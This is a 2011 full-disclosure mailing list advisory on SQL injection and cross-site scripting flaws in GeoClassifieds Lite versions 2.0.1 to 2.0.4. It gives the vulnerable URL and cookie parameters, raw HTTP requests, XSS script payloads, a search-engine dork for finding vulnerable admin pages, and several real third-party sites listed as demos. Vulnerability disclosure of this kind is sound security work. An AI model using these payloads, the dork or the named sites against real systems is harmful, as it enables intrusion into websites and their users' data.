Date: Mon, 5 Sep 2011 20:09:22 +0000
From: Yassin Aboukir <01xp01@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: GeoClassifieds Lite Multiple vulnerabilities

---------------------------------------------------------------------
[+] Title            : GeoClassifieds Lite Multiple vulnerabilities
[+] Affected Version : v2.0.1 & V2.0.3.1 & V2.0.3.2 & V2.0.4
[+] Software Link    : http://geodesicsolutions.com/
[+] Tested on        : Windows 7 <Firefox>
[+] Date             : 25/08/2011
[+] Dork             : "inurl:/admin/ Classifieds and Auctions
Software by Geodesic Solutions"
[+] Category         : Webapps
[+] Severity         : High to Medium
[+] Author           : Yassin Aboukir <01Xp01|At|Gmail.com>
[+] Site             : http://www.Yaboukir.Com
----------------------------------------------------------------------

[+] About the Software: [ Purchased Price: $399 USD - $799 USD] Geo
Classifieds Premier gives you all the options of the Basic classifieds
software edition, plus additional flexibility and powerful
functionality. It allows you to create multiple user groups and
multiple pricing plans, and is built to suit the most complicated
E-Commerce needs.

[+] How it can be exploited:

### V2.0.1 : Suffers from SQL injection and cross-site scripting (XSS)
vulnerabilities.

1- SQL Injection (High) :

    http://Localhost/?a=19&c=id [SQL Attack]

2- Cookies Based SQL Injection (High) :

# Read More About The Attack :
http://www.Yaboukir.com/cookie-based-sql-injection/

The idea of the PoC is to intercept the HTTP request sent to the
vulnerable website using a web proxy (WebScarab, for example, or just
the Tamper Data Firefox add-on) and then modify the cookie variable
language_id.

GET  HTTP/1.1
Host: localhost.com
Connection: keep-alive
Cookie: language_id=1[SQL attack]

3- Cross Site Scripting (Medium) :

The same applies to the XSS vulnerability: all you have to do is modify
the HTTP request.

GET  HTTP/1.1
Host: localhost.com
Connection: keep-alive
Cookie: </div><script>alert('Xssed-By-Yassin');</script>

Demos:
http://classified4u.biz/
http://www.freeclassifieds.aapkakolkata.com/


### V2.0.3.1 & V2.0.3.2 & V2.0.4 : Suffer from cross-site scripting (XSS).

1- Cross Site Scripting (Medium) :

http://Localhost/index.php?a=19&c=</div><script>alert('Xssed By Yassin');</script>
http://Localhost/?a=19&c="+onmouseover=alert('Xssed-By-Yassin')+

Demos:
http://www.tescal.com/ads/
http://www.216ads.com/
